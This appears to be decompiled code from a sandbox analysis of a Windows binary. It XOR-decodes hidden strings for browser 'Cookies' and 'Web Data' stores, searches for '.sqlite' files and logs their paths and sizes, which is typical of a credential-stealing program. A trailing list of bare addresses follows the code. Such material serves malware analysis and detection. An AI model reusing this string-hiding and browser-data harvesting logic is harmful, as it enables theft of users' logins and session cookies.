								 *((char*)(_t1224 - 4)) = 0x19;
								E0082E5D4(_t593, _t1224 - 0x74);
								_t1205 =  *(_t1224 - 0x14) | 0x00100000;
								 *(_t1224 - 0x1c) = _t1205;
								_t595 = E0082EA7D(_t1224 - 0x74, 0x8b51e0, _t1183, _t1205);
								E0082DF41(_t1224 - 0x74);
								_t907 = _t1224 - 0xb0;
								 *((char*)(_t1224 - 4)) = 0x14;
								L0082DD77(_t907);
								if(_t595 == 0) {
									_t598 =  *0x8b5544; // 0x80000037
									 *((intOrPtr*)(_t1224 - 0x80)) = 0x4541416d;
									 *((intOrPtr*)(_t1224 - 0x7c)) = 0x2e5d4b47;
									__eflags = _t598 -  *((intOrPtr*)(_t1183 + 4));
									if(_t598 >  *((intOrPtr*)(_t1183 + 4))) {
										E0086DB91(_t598, 0x8b5544);
										__eflags =  *0x8b5544 - 0xffffffff;
										if(__eflags == 0) {
											_t246 = _t1224 - 0x80; // 0x4541416d
											_t247 = _t1224 - 0x7c; // 0x2e5d4b47
											 *0x8b60b0 =  *_t246;
											 *0x8b60b4 =  *_t247;
											L0086DFE8( *_t247, __eflags, 0x89622b);
											 *_t1227 = 0x8b5544;
											L0086DB47();
										}
									}
									__eflags =  *0x8b60b7;
									if( *0x8b60b7 == 0) {
										L41:
										_t908 =  *(_t1224 - 0x24);
										_t600 = E008123EB(_t908, _t1224 - 0xb0);
										_push(_t908);
										 *((char*)(_t1224 - 4)) = 0x2a;
										_t1206 = _t1205 | 0x00000010;
										 *(_t1224 - 0x1c) = _t1206;
										E0082E5D4(_t600, _t1224 - 0x74);
										 *(_t1224 - 0x20) =  *(_t1224 - 0x20) | 0x00000040;
										 *((intOrPtr*)(_t1224 - 4)) = 0x2b;
										_t911 = _t1224 - 0x74;
										_t1207 = _t1206 | 0x00000020;
										 *(_t1224 - 0x14) = _t1207;
										 *(_t1224 - 0x1c) = _t1207;
										_t602 = E0082EA7D(_t911, 0x8b60b0, _t1183, _t1207);
										__eflags = _t602;
										if(_t602 != 0) {
											L43:
											 *((char*)(_t1224 - 0x15)) = 1;
											L44:
											_t603 =  *(_t1224 - 0x14);
											__eflags = _t603;
											if(_t603 < 0) {
												_t753 = _t603 & 0xffffff7f;
												__eflags = _t753;
												_t911 = _t1224 - 0x40;
												 *(_t1224 - 0x14) = _t753;
												 *(_t1224 - 0x1c) = _t753;
												E0082DF41(_t911);
												_t603 =  *(_t1224 - 0x14);
											}
											__eflags = _t603 & 0x00000040;
											if((_t603 & 0x00000040) != 0) {
												_t751 = _t603 & 0xffffffbf;
												__eflags = _t751;
												_t911 = _t1224 - 0xc8;
												 *(_t1224 - 0x14) = _t751;
												 *(_t1224 - 0x1c) = _t751;
												L0082DD77(_t911);
												_t603 =  *(_t1224 - 0x14);
											}
											__eflags = _t603 & 0x00000020;
											if((_t603 & 0x00000020) != 0) {
												_t749 = _t603 & 0xffffffdf;
												__eflags = _t749;
												_t911 = _t1224 - 0x74;
												 *(_t1224 - 0x14) = _t749;
												 *(_t1224 - 0x1c) = _t749;
												E0082DF41(_t911);
												_t603 =  *(_t1224 - 0x14);
											}
											 *((intOrPtr*)(_t1224 - 4)) = 0x14;
											__eflags = _t603 & 0x00000010;
											if((_t603 & 0x00000010) != 0) {
												_t747 = _t603 & 0xffffffef;
												__eflags = _t747;
												_t911 = _t1224 - 0xb0;
												 *(_t1224 - 0x14) = _t747;
												 *(_t1224 - 0x1c) = _t747;
												L0082DD77(_t911);
											}
											__eflags =  *((char*)(_t1224 - 0x15));
											if( *((char*)(_t1224 - 0x15)) == 0) {
												_t604 =  *0x8b59e0; // 0x80000039
												 *((intOrPtr*)(_t1224 - 0x8c)) = 0xe4c4b79;
												 *((intOrPtr*)(_t1224 - 0x88)) = 0x4f5a4f6a;
												 *((char*)(_t1224 - 0x84)) = 0x2e;
												__eflags = _t604 -  *((intOrPtr*)(_t1183 + 4));
												if(_t604 >  *((intOrPtr*)(_t1183 + 4))) {
													E0086DB91(_t604, 0x8b59e0);
													__eflags =  *0x8b59e0 - 0xffffffff;
													_pop(_t981);
													if(__eflags == 0) {
														asm("movsd");
														asm("movsd");
														asm("movsb");
														L0086DFE8(_t981, __eflags, 0x8961fe);
														 *_t1227 = 0x8b59e0;
														L0086DB47();
													}
												}
												__eflags =  *0x8b4ee0;
												if( *0x8b4ee0 == 0) {
													L69:
													_t1208 =  *(_t1224 - 0x24);
													_t912 =  *(_t1224 - 0x24);
													_t606 = E008123EB(_t912, _t1224 - 0xc8);
													_push(_t912);
													 *((char*)(_t1224 - 4)) = 0x3d;
													E0082E5D4(_t606, _t1224 - 0x40);
													_t1182 =  *(_t1224 - 0x20) | 0x08000000;
													 *(_t1224 - 0x20) = _t1182;
													_t608 = E0082EA7D(_t1224 - 0x40, 0x8b4ed8, _t1182,  *(_t1224 - 0x24));
													E0082DF41(_t1224 - 0x40);
													_t917 = _t1224 - 0xc8;
													 *((char*)(_t1224 - 4)) = 0x14;
													L0082DD77(_t917);
													__eflags = _t608;
													if(_t608 == 0) {
														_t854 = 0;
														__eflags = 0;
														goto L77;
													}
													_push(_t917);
													E0082E5D4(_t1208, _t1224 - 0x40);
													 *((char*)(_t1224 - 0x170)) = 0;
													_push( *((intOrPtr*)(_t1224 - 0x170)));
													 *(_t1224 - 0x20) = _t1182;
													E0082E143(_t1224 - 0x100, _t1224 - 0x40);
													E0082DF41(_t1224 - 0x40);
													_push( *((intOrPtr*)(_t1224 - 0xf0)));
													_t619 = E0082D8D6(_t1224 - 0x100, _t1182, _t1224 - 0xc8,  *((intOrPtr*)(_t1224 + 0x18)) + 1);
													_t922 = _t1224 - 0x5c;
													__eflags = _t1224 - 0x5c - _t619;
													if(_t1224 - 0x5c != _t619) {
														 *((char*)(_t1224 - 0x16c)) = 0;
														_push( *((intOrPtr*)(_t1224 - 0x16c)));
														E0082E143(_t922, _t619);
													}
													_t923 = _t1224 - 0xc8;
													E0082DF41(_t923);
													_push(_t923);
													_push(E0082D960(_t1224 - 0x5c, "\\"));
													_t623 = E0082D8D6(_t1224 - 0x5c, _t1182, _t1224 - 0xc8, 0);
													_t926 = _t1224 - 0x5c;
													__eflags = _t1224 - 0x5c - _t623;
													if(_t1224 - 0x5c != _t623) {
														 *((char*)(_t1224 - 0x160)) = 0;
														_push( *((intOrPtr*)(_t1224 - 0x160)));
														E0082E143(_t926, _t623);
													}
													E0082DF41(_t1224 - 0xc8);
													 *((char*)(_t1224 - 0x184)) = 0;
													_push( *((intOrPtr*)(_t1224 - 0x184)));
													L0082FEC9(_t1224 - 0x138);
													 *((char*)(_t1224 - 4)) = 0x3e;
													E00813225(0, _t1224 - 0x40, _t1224 - 0x138, _t1182); // executed
													 *((char*)(_t1224 - 4)) = 0x14;
													L0082DD77(_t1224 - 0x40);
													 *((char*)(_t1224 - 0x178)) = 0;
													_push( *((intOrPtr*)(_t1224 - 0x178)));
													L0082FEC9(_t1224 - 0x138);
													 *((char*)(_t1224 - 0x44)) = 0;
													_push( *((intOrPtr*)(_t1224 - 0x44)));
													 *((char*)(_t1224 - 4)) = 0x3f;
													L0082FEC9(_t1224 - 0x100);
													_pop(_t935);
													 *((char*)(_t1224 - 4)) = 0x40;
													_t630 = E00813139(0, _t1224 - 0x40, _t1224 - 0x74, _t1182); // executed
													L0082DD77(_t1224 - 0x40);
													_t939 = _t1224 - 0x74;
													 *((char*)(_t1224 - 4)) = 0x14;
													L0082DD77(_t939);
													__eflags = _t630;
													if(_t630 == 0) {
														goto L61;
													} else {
														_push(_t939);
														E0082E5D4(_t1208, _t1224 - 0x40);
														_t1186 =  *(_t1224 - 0x78) | 0x00000080;
														 *(_t1224 - 0x78) = _t1186;
														 *((char*)(_t1224 - 4)) = 0x41;
														_t636 = E0082E917(_t1224 - 0x118, _t1224 - 0x40, __eflags, " [");
														 *((char*)(_t1224 - 4)) = 0x42;
														_t637 = E0082E981(_t1224 - 0xb0, _t636, _t1224 - 0x5c);
														 *((char*)(_t1224 - 4)) = 0x43;
														_t638 = E0082E917(_t1224 - 0xc8, _t637, __eflags, "]\n");
														 *((char*)(_t1224 - 4)) = 0x44;
														E0082D9E5(_t638);
														E0082DF41(_t1224 - 0xc8);
														E0082DF41(_t1224 - 0xb0);
														E0082DF41(_t1224 - 0x118);
														 *((char*)(_t1224 - 4)) = 0x14;
														E0082DF41(_t1224 - 0x40);
														_t1229 = _t1227 - 0x18;
														_t954 = _t1229;
														 *((intOrPtr*)(_t1224 - 0x28)) = _t1229;
														_t854 = 0;
														 *((intOrPtr*)(_t954 + 0x10)) = 0;
														 *((intOrPtr*)(_t954 + 0x14)) = 0;
														E0082E0AB(_t954, _t1224 - 0x5c);
														_push("\\");
														 *((char*)(_t1224 - 4)) = 0x45;
														_t646 = E0082E8C7(0, _t1224 - 0xc8, _t1224 + 8, _t1186);
														_t1230 = _t1229 - 0x18;
														 *((char*)(_t1224 - 4)) = 0x46;
														E0082E981(_t1230, _t646, _t1224 - 0x5c);
														_pop(_t958);
														 *((char*)(_t1224 - 4)) = 0x47;
														E00826A63(0, _t958, _t646, __eflags);
														 *((char*)(_t1224 - 4)) = 0x14;
														E0082DF41(_t1224 - 0xc8);
														_push(_t1224 - 0x5c);
														_push(_t1224 - 0x1b4);
														L0082FE25(_t1224 - 0x74, L0082FE0D(_t1224 - 0xd3,  *((intOrPtr*)( *((intOrPtr*)(L0082EC6B(0, _t1224 - 0xc8, _t646, __eflags))) + 0x38))), _t1224 - 0xd3);
														_t1187 = _t1186 | 0x00000c00;
														 *(_t1224 - 0x78) = _t1187;
														 *((char*)(_t1224 - 4)) = 0x48;
														_t658 = L0082EC6B(0, _t1224 - 0x74,  *((intOrPtr*)( *((intOrPtr*)(L0082EC6B(0, _t1224 - 0xc8, _t646, __eflags))) + 0x38)), __eflags, _t1224 - 0x1bc, _t1224 - 0x5c, _t1224 - 0xd3);
														_t661 = E0082E9EC(0, _t1224 - 0x118, E0082D2AE(E0082A49C()));
														 *((char*)(_t1224 - 4)) = 0x49;
														_t662 = E0082E917(_t1224 - 0xb0, _t661, __eflags, " (size: ");
														 *((char*)(_t1224 - 4)) = 0x4a;
														E0082FA3B(_t1224 - 0x40,  *((intOrPtr*)(_t1224 - 0x44)), _t662, _t1224 - 0x74,  *_t658 + 0x28);
														_t1182 = _t1187 | 0x00001000;
														 *(_t1224 - 0x78) = _t1187 | 0x00001000;
														_t1150 = _t1224 - 0x40;
														 *((char*)(_t1224 - 4)) = 0x4b;
														_t664 = E0082E917(_t1224 - 0xc8, _t1224 - 0x40, __eflags, ")\n");
														 *((char*)(_t1224 - 4)) = 0x4c;
														E0082D9E5(_t664);
														E0082DF41(_t1224 - 0xc8);
														E0082DF41(_t1224 - 0x40);
														E0082DF41(_t1224 - 0xb0);
														E0082DF41(_t1224 - 0x118);
														 *((char*)(_t1224 - 4)) = 0x14;
														E0082DF41(_t1224 - 0x74);
														_t1232 = _t1230 + 0x30 - 0x18;
														_t978 = _t1232;
														 *((intOrPtr*)(_t1224 - 0x28)) = _t1232;
														 *((intOrPtr*)(_t978 + 0x10)) = 0;
														 *((intOrPtr*)(_t978 + 0x14)) = 0;
														E0082E0AB(_t978, _t1224 - 0x138);
														_t1233 = _t1232 - 0x18;
														 *((char*)(_t1224 - 4)) = 0x4d;
														_t979 = _t1233;
														 *((intOrPtr*)(_t979 + 0x10)) = 0;
														 *((intOrPtr*)(_t979 + 0x14)) = 0;
														E0082E0AB(_t979, _t1224 - 0x5c);
														_push(3);
														goto L59;
													}
												} else {
													_t678 = 0;
													do {
														 *(_t678 + 0x8b4ed8) =  *(_t678 + 0x8b4ed8) ^ 0x0000002e;
														_t678 = _t678 + 1;
														__eflags = _t678 - 9;
													} while (_t678 < 9);
													goto L69;
												}
											} else {
												_t1212 =  *(_t1224 - 0x24);
												_push(_t911);
												E0082E5D4( *(_t1224 - 0x24), _t1224 - 0x40);
												 *((char*)(_t1224 - 0x154)) = 0;
												_push( *((intOrPtr*)(_t1224 - 0x154)));
												_t1182 =  *(_t1224 - 0x20) | 0x00001000;
												 *(_t1224 - 0x20) = _t1182;
												E0082E143(_t1224 - 0x100, _t1224 - 0x40);
												E0082DF41(_t1224 - 0x40);
												_push( *((intOrPtr*)(_t1224 - 0xf0)));
												_t690 = E0082D8D6(_t1224 - 0x100, _t1182, _t1224 - 0xc8,  *((intOrPtr*)(_t1224 + 0x18)) + 1);
												_t987 = _t1224 - 0x5c;
												__eflags = _t1224 - 0x5c - _t690;
												if(_t1224 - 0x5c != _t690) {
													 *((char*)(_t1224 - 0x158)) = 0;
													_push( *((intOrPtr*)(_t1224 - 0x158)));
													E0082E143(_t987, _t690);
												}
												_t988 = _t1224 - 0xc8;
												E0082DF41(_t988);
												_push(_t988);
												_push(E0082D960(_t1224 - 0x5c, "\\"));
												_t694 = E0082D8D6(_t1224 - 0x5c, _t1182, _t1224 - 0xc8, 0);
												_t991 = _t1224 - 0x5c;
												__eflags = _t1224 - 0x5c - _t694;
												if(_t1224 - 0x5c != _t694) {
													 *((char*)(_t1224 - 0x15c)) = 0;
													_push( *((intOrPtr*)(_t1224 - 0x15c)));
													E0082E143(_t991, _t694);
												}
												E0082DF41(_t1224 - 0xc8);
												 *((char*)(_t1224 - 0x180)) = 0;
												_push( *((intOrPtr*)(_t1224 - 0x180)));
												L0082FEC9(_t1224 - 0x138);
												 *((char*)(_t1224 - 4)) = 0x2d;
												E00813225(0, _t1224 - 0x40, _t1224 - 0x138, _t1182); // executed
												 *((char*)(_t1224 - 4)) = 0x14;
												L0082DD77(_t1224 - 0x40);
												 *((char*)(_t1224 - 0x17c)) = 0;
												_push( *((intOrPtr*)(_t1224 - 0x17c)));
												L0082FEC9(_t1224 - 0x138);
												 *((char*)(_t1224 - 0x174)) = 0;
												_push( *((intOrPtr*)(_t1224 - 0x174)));
												 *((char*)(_t1224 - 4)) = 0x2e;
												L0082FEC9(_t1224 - 0x100);
												_pop(_t1000);
												 *((char*)(_t1224 - 4)) = 0x2f;
												_t701 = E00813139(0, _t1224 - 0x40, _t1224 - 0x74, _t1182); // executed
												L0082DD77(_t1224 - 0x40);
												_t1004 = _t1224 - 0x74;
												 *((char*)(_t1224 - 4)) = 0x14;
												L0082DD77(_t1004);
												__eflags = _t701;
												if(_t701 == 0) {
													L61:
													_t854 = 0;
													__eflags = 0;
													goto L62;
												} else {
													_push(_t1004);
													E0082E5D4(_t1212, _t1224 - 0x40);
													_t1190 = _t1182 | 0x00200000;
													 *(_t1224 - 0x20) = _t1190;
													 *((char*)(_t1224 - 4)) = 0x30;
													_t706 = E0082E917(_t1224 - 0x118, _t1224 - 0x40, __eflags, " [");
													 *((char*)(_t1224 - 4)) = 0x31;
													_t707 = E0082E981(_t1224 - 0xb0, _t706, _t1224 - 0x5c);
													 *((char*)(_t1224 - 4)) = 0x32;
													_t708 = E0082E917(_t1224 - 0xc8, _t707, __eflags, "]\n");
													 *((char*)(_t1224 - 4)) = 0x33;
													E0082D9E5(_t708);
													E0082DF41(_t1224 - 0xc8);
													E0082DF41(_t1224 - 0xb0);
													E0082DF41(_t1224 - 0x118);
													 *((char*)(_t1224 - 4)) = 0x14;
													E0082DF41(_t1224 - 0x40);
													_t1234 = _t1227 - 0x18;
													_t1018 = _t1234;
													 *((intOrPtr*)(_t1224 - 0x28)) = _t1234;
													_t854 = 0;
													 *((intOrPtr*)(_t1018 + 0x10)) = 0;
													 *((intOrPtr*)(_t1018 + 0x14)) = 0;
													E0082E0AB(_t1018, _t1224 - 0x5c);
													_push("\\");
													 *((char*)(_t1224 - 4)) = 0x34;
													_t716 = E0082E8C7(0, _t1224 - 0xc8, _t1224 + 8, _t1190);
													_t1235 = _t1234 - 0x18;
													 *((char*)(_t1224 - 4)) = 0x35;
													E0082E981(_t1235, _t716, _t1224 - 0x5c);
													_pop(_t1022);
													 *((char*)(_t1224 - 4)) = 0x36;
													E00826A63(0, _t1022, _t716, __eflags);
													 *((char*)(_t1224 - 4)) = 0x14;
													E0082DF41(_t1224 - 0xc8);
													_push(_t1224 - 0x5c);
													_push(_t1224 - 0x1a4);
													L0082FE25(_t1224 - 0x74, L0082FE0D(_t1224 - 0xd3,  *((intOrPtr*)( *((intOrPtr*)(L0082EC6B(0, _t1224 - 0xc8, _t716, __eflags))) + 0x38))), _t1224 - 0xd3);
													_t1191 = _t1190 | 0x03000000;
													 *(_t1224 - 0x20) = _t1191;
													 *((char*)(_t1224 - 4)) = 0x37;
													_t728 = L0082EC6B(0, _t1224 - 0x74,  *((intOrPtr*)( *((intOrPtr*)(L0082EC6B(0, _t1224 - 0xc8, _t716, __eflags))) + 0x38)), __eflags, _t1224 - 0x1ac, _t1224 - 0x5c, _t1224 - 0xd3);
													_t731 = E0082E9EC(0, _t1224 - 0x118, E0082D2AE(E0082A420()));
													 *((char*)(_t1224 - 4)) = 0x38;
													_t732 = E0082E917(_t1224 - 0xb0, _t731, __eflags, " (size: ");
													 *((char*)(_t1224 - 4)) = 0x39;
													E0082FA3B(_t1224 - 0x40,  *((intOrPtr*)(_t1224 - 0x44)), _t732, _t1224 - 0x74,  *_t728 + 0x28);
													_t1182 = _t1191 | 0x04000000;
													__eflags = _t1182;
													 *(_t1224 - 0x20) = _t1182;
													_t1150 = _t1224 - 0x40;
													 *((char*)(_t1224 - 4)) = 0x3a;
													_t734 = E0082E917(_t1224 - 0xc8, _t1224 - 0x40, _t1182, ")\n");
													 *((char*)(_t1224 - 4)) = 0x3b;
													E0082D9E5(_t734);
													E0082DF41(_t1224 - 0xc8);
													E0082DF41(_t1224 - 0x40);
													E0082DF41(_t1224 - 0xb0);
													E0082DF41(_t1224 - 0x118);
													 *((char*)(_t1224 - 4)) = 0x14;
													E0082DF41(_t1224 - 0x74);
													_t1237 = _t1235 + 0x30 - 0x18;
													_t1042 = _t1237;
													 *((intOrPtr*)(_t1224 - 0x28)) = _t1237;
													 *((intOrPtr*)(_t1042 + 0x10)) = 0;
													 *((intOrPtr*)(_t1042 + 0x14)) = 0;
													E0082E0AB(_t1042, _t1224 - 0x138);
													_t1233 = _t1237 - 0x18;
													 *((char*)(_t1224 - 4)) = 0x3c;
													_t1043 = _t1233;
													 *((intOrPtr*)(_t1043 + 0x10)) = 0;
													 *((intOrPtr*)(_t1043 + 0x14)) = 0;
													E0082E0AB(_t1043, _t1224 - 0x5c);
													_push(2);
													L59:
													_pop(1);
													L60:
													 *((char*)(_t1224 - 4)) = 0x14;
													E00827009(_t854, 1, _t1150, _t1267); // executed
													_t1227 = _t1233 + 0x30;
													L62:
													E0082D9C4("\n");
													goto L77;
												}
											}
										}
										_t756 = E0082D2AE(E0082A3A4());
										_t758 = E008123EB( *(_t1224 - 0x24), _t1224 - 0xc8);
										 *((intOrPtr*)(_t1224 - 4)) = 0x2c;
										_t1047 =  *(_t1224 - 0x14) | 0x00000040;
										_push(_t1047);
										 *(_t1224 - 0x14) = _t1047;
										 *(_t1224 - 0x1c) = _t1047;
										E0082E5D4(_t758, _t1224 - 0x40);
										_t911 = _t1224 - 0x40;
										 *(_t1224 - 0x20) =  *(_t1224 - 0x20) | 0x00000200;
										_t761 =  *(_t1224 - 0x14) | 0x00000080;
										 *(_t1224 - 0x14) = _t761;
										 *(_t1224 - 0x1c) = _t761;
										_t762 = E0082EA7D(_t911, _t756, _t1183, _t756);
										 *((char*)(_t1224 - 0x15)) = 0;
										__eflags = _t762;
										if(_t762 == 0) {
											goto L44;
										}
										goto L43;
									} else {
										_t763 = 0;
										do {
											 *(_t763 + 0x8b60b0) =  *(_t763 + 0x8b60b0) ^ 0x0000002e;
											_t763 = _t763 + 1;
											__eflags = _t763 - 8;
										} while (_t763 < 8);
										goto L41;
									}
								}
								_t1182 =  *(_t1224 - 0x24);
								_push(_t907);
								E0082E5D4( *(_t1224 - 0x24), _t1224 - 0x74);
								 *((char*)(_t1224 - 0x13c)) = 0;
								_push( *((intOrPtr*)(_t1224 - 0x13c)));
								_t1216 = _t1205 | 0x00800000;
								 *(_t1224 - 0x14) = _t1216;
								 *(_t1224 - 0x1c) = _t1216;
								E0082E143(_t1224 - 0x100, _t1224 - 0x74);
								E0082DF41(_t1224 - 0x74);
								_push( *((intOrPtr*)(_t1224 - 0xf0)));
								_t776 = E0082D8D6(_t1224 - 0x100,  *(_t1224 - 0x24), _t1224 - 0xb0,  *((intOrPtr*)(_t1224 + 0x18)) + 1);
								_t1057 = _t1224 - 0x5c;
								if(_t1224 - 0x5c != _t776) {
									 *((char*)(_t1224 - 0x140)) = 0;
									_push( *((intOrPtr*)(_t1224 - 0x140)));
									E0082E143(_t1057, _t776);
								}
								_t1058 = _t1224 - 0xb0;
								E0082DF41(_t1058);
								_push(_t1058);
								_t1217 = "\\";
								_push(E0082D960(_t1224 - 0x5c, _t1217));
								_t780 = E0082D8D6(_t1224 - 0x5c, _t1182, _t1224 - 0xb0, 0);
								_t1061 = _t1224 - 0x5c;
								if(_t1224 - 0x5c != _t780) {
									 *((char*)(_t1224 - 0x144)) = 0;
									_push( *((intOrPtr*)(_t1224 - 0x144)));
									E0082E143(_t1061, _t780);
								}
								E0082DF41(_t1224 - 0xb0);
								 *((char*)(_t1224 - 0x148)) = 0;
								_push( *((intOrPtr*)(_t1224 - 0x148)));
								L0082FEC9(_t1224 - 0x138);
								 *((char*)(_t1224 - 4)) = 0x1a;
								E00813225(0, _t1224 - 0x74, _t1224 - 0x138, _t1182); // executed
								 *((char*)(_t1224 - 4)) = 0x14;
								L0082DD77(_t1224 - 0x74);
								 *((char*)(_t1224 - 0x14c)) = 0;
								_push( *((intOrPtr*)(_t1224 - 0x14c)));
								L0082FEC9(_t1224 - 0x138);
								 *((char*)(_t1224 - 0x150)) = 0;
								_push( *((intOrPtr*)(_t1224 - 0x150)));
								 *((char*)(_t1224 - 4)) = 0x1b;
								L0082FEC9(_t1224 - 0x100);
								_pop(_t1070);
								 *((char*)(_t1224 - 4)) = 0x1c;
								_t787 = E00813139(0, _t1224 - 0x74, _t1224 - 0xe8, _t1182); // executed
								L0082DD77(_t1224 - 0x74);
								_t1074 = _t1224 - 0xe8;
								 *((char*)(_t1224 - 4)) = 0x14;
								L0082DD77(_t1074);
								_t1267 = _t787;
								if(_t787 == 0) {
									goto L61;
								} else {
									_push(_t1074);
									E0082E5D4(_t1182, _t1224 - 0x74);
									_t1193 =  *(_t1224 - 0x20) | 0x00000001;
									 *(_t1224 - 0x20) = _t1193;
									 *((char*)(_t1224 - 4)) = 0x1d;
									_t792 = E0082E917(_t1224 - 0x40, _t1224 - 0x74, _t1267, " [");
									 *((char*)(_t1224 - 4)) = 0x1e;
									_t793 = E0082E981(_t1224 - 0x118, _t792, _t1224 - 0x5c);
									 *((char*)(_t1224 - 4)) = 0x1f;
									_t794 = E0082E917(_t1224 - 0xb0, _t793, _t1267, "]\n");
									 *((char*)(_t1224 - 4)) = 0x20;
									E0082D9E5(_t794);
									E0082DF41(_t1224 - 0xb0);
									E0082DF41(_t1224 - 0x118);
									E0082DF41(_t1224 - 0x40);
									 *((char*)(_t1224 - 4)) = 0x14;
									E0082DF41(_t1224 - 0x74);
									_t1238 = _t1227 - 0x18;
									_t1088 = _t1238;
									 *((intOrPtr*)(_t1224 - 0x28)) = _t1238;
									_t854 = 0;
									 *((intOrPtr*)(_t1088 + 0x10)) = 0;
									 *((intOrPtr*)(_t1088 + 0x14)) = 0;
									E0082E0AB(_t1088, _t1224 - 0x5c);
									 *((char*)(_t1224 - 4)) = 0x21;
									_t802 = E0082E8C7(0, _t1224 - 0xb0, _t1224 + 8, _t1193);
									_t1239 = _t1238 - 0x18;
									 *((char*)(_t1224 - 4)) = 0x22;
									E0082E981(_t1239, _t802, _t1224 - 0x5c);
									_t1092 = _t1217;
									 *((char*)(_t1224 - 4)) = 0x23;
									E00826A63(0, _t1092, _t802, _t1267); // executed
									 *((char*)(_t1224 - 4)) = 0x14;
									E0082DF41(_t1224 - 0xb0);
									_push(_t1224 - 0x5c);
									_push(_t1224 - 0x194);
									L0082FE25(_t1224 - 0x40, L0082FE0D(_t1224 - 0xd3,  *((intOrPtr*)( *((intOrPtr*)(L0082EC6B(0, _t1224 - 0xb0, _t802, _t1267))) + 0x38))), _t1224 - 0xd3);
									_t1194 = _t1193 | 0x00000018;
									 *(_t1224 - 0x20) = _t1194;
									 *((char*)(_t1224 - 4)) = 0x24;
									_t814 = L0082EC6B(0, _t1224 - 0x40,  *((intOrPtr*)( *((intOrPtr*)(L0082EC6B(0, _t1224 - 0xb0, _t802, _t1267))) + 0x38)), _t1267, _t1224 - 0x19c, _t1224 - 0x5c, _t1224 - 0xd3);
									_t817 = E0082E9EC(0, _t1224 - 0xc8, E0082D2AE(E0082A328()));
									 *((char*)(_t1224 - 4)) = 0x25;
									_t818 = E0082E917(_t1224 - 0x118, _t817, _t1267, " (size: ");
									 *((char*)(_t1224 - 4)) = 0x26;
									E0082FA3B(_t1224 - 0x74,  *((intOrPtr*)(_t1224 - 0x44)), _t818, _t1224 - 0x40,  *_t814 + 0x28);
									_t1182 = _t1194 | 0x00000020;
									 *(_t1224 - 0x20) = _t1194 | 0x00000020;
									_t1150 = _t1224 - 0x74;
									 *((char*)(_t1224 - 4)) = 0x27;
									_t820 = E0082E917(_t1224 - 0xb0, _t1224 - 0x74, _t1267, ")\n");
									 *((char*)(_t1224 - 4)) = 0x28;
									E0082D9E5(_t820);
									E0082DF41(_t1224 - 0xb0);
									E0082DF41(_t1224 - 0x74);
									E0082DF41(_t1224 - 0x118);
									E0082DF41(_t1224 - 0xc8);
									 *((char*)(_t1224 - 4)) = 0x14;
									E0082DF41(_t1224 - 0x40);
									_t1241 = _t1239 + 0x30 - 0x18;
									_t1112 = _t1241;
									 *((intOrPtr*)(_t1224 - 0x28)) = _t1241;
									 *((intOrPtr*)(_t1112 + 0x10)) = 0;
									 *((intOrPtr*)(_t1112 + 0x14)) = 0;
									E0082E0AB(_t1112, _t1224 - 0x138);
									_t1233 = _t1241 - 0x18;
									 *((char*)(_t1224 - 4)) = 0x29;
									_t1113 = _t1233;
									 *((intOrPtr*)(_t1113 + 0x10)) = 0;
									 *((intOrPtr*)(_t1113 + 0x14)) = 0;
									E0082E0AB(_t1113, _t1224 - 0x5c);
									goto L60;
								}
							} else {
								_t833 = _t854;
								do {
									 *(_t833 + 0x8b51e0) =  *(_t833 + 0x8b51e0) ^ 0x0000002e;
									_t833 = _t833 + 1;
								} while (_t833 < 0xb);
								goto L28;
							}
						}
					}
					_t1121 = _t1182 + 0x20;
					_t846 = E00812425(_t1121, _t1224 - 0xb0);
					_push(_t1121);
					 *((intOrPtr*)(_t1224 - 4)) = 0x17;
					_t1221 = _t1203 | 0x00000004;
					 *(_t1224 - 0x1c) = _t1221;
					E0082E5D4(_t846, _t1224 - 0xe8);
					 *((intOrPtr*)(_t1224 - 4)) = 0x18;
					_t1223 = _t1221 | 0x20008;
					_t1178 = ".sqlite";
					 *(_t1224 - 0x14) = _t1223;
					 *(_t1224 - 0x1c) = _t1223;
					if(E0082EA7D(_t1224 - 0xe8, _t1178, _t1182, _t1223) == 0) {
						L11:
						 *((char*)(_t1224 - 0x15)) = _t854;
						goto L13;
					}
					_t849 = E00812AC6(_t854, _t1182, _t1182);
					_t1249 = _t1178 - _t854;
					if(_t1249 > 0 || _t1249 >= 0 && _t849 > 0x1e) {
						goto L12;
					} else {
						goto L11;
					}
				}
				__eflags = _t1199;
				if(_t1199 != 0) {
					E008116CB(_t1199);
				}
				_t890 =  *(_t1224 - 0x164);
				__eflags =  *(_t1224 - 0x164);
				if( *(_t1224 - 0x164) != 0) {
					E008116CB(_t890);
				}
				E0082DF41(_t1224 - 0x5c);
				E0082DF41(_t1224 - 0x100);
				E0082DF41(_t1224 - 0x138);
				goto L84;
			}














































































































































                                    0x00829156
                                    0x0082915b
                                    0x00829161
                                    0x00829165
                                    0x00829166
                                    0x00829169
                                    0x0082916c
                                    0x0082916f
                                    0x00829172
                                    0x00829178
                                    0x00829181
                                    0x00829184
                                    0x00829190
                                    0x00829194
                                    0x0082919f
                                    0x008291a3
                                    0x008291a5
                                    0x008291aa
                                    0x008291ac
                                    0x0082a311
                                    0x0082a314
                                    0x0082a31e
                                    0x0082a327
                                    0x0082a327
                                    0x008291b4
                                    0x008291c0
                                    0x008291c4
                                    0x008291cb
                                    0x008291cf
                                    0x008291e0
                                    0x008291e7
                                    0x008291f8
                                    0x008291fc
                                    0x0082920c
                                    0x00829213
                                    0x00829219
                                    0x0082921a
                                    0x0082921b
                                    0x00829224
                                    0x00829228
                                    0x00829232
                                    0x00829235
                                    0x0082923b
                                    0x00829246
                                    0x0082924e
                                    0x00829259
                                    0x00829264
                                    0x0082926b
                                    0x0082926d
                                    0x0082926e
                                    0x00829274
                                    0x0082927a
                                    0x00829280
                                    0x00829283
                                    0x00829286
                                    0x00829289
                                    0x00829298
                                    0x0082929c
                                    0x008292a7
                                    0x008292b2
                                    0x008292bd
                                    0x008292cf
                                    0x008292d4
                                    0x008292da
                                    0x008292e0
                                    0x008292e6
                                    0x008292f9
                                    0x008292fe
                                    0x00829304
                                    0x00829307
                                    0x0082930f
                                    0x00829311
                                    0x00829317
                                    0x0082931f
                                    0x00829321
                                    0x00829326
                                    0x00829326
                                    0x00829328
                                    0x0082932c
                                    0x00829336
                                    0x0082933a
                                    0x00829341
                                    0x0082a299
                                    0x0082a299
                                    0x0082a2bd
                                    0x0082a2c2
                                    0x0082a2c8
                                    0x0082a2ce
                                    0x00000000
                                    0x0082a2ce
                                    0x00829347
                                    0x00829350
                                    0x00829354
                                    0x00829356
                                    0x0082935b
                                    0x0082935c
                                    0x00829367
                                    0x0082936c
                                    0x0082936f
                                    0x0082937a
                                    0x00829384
                                    0x0082938c
                                    0x0082938f
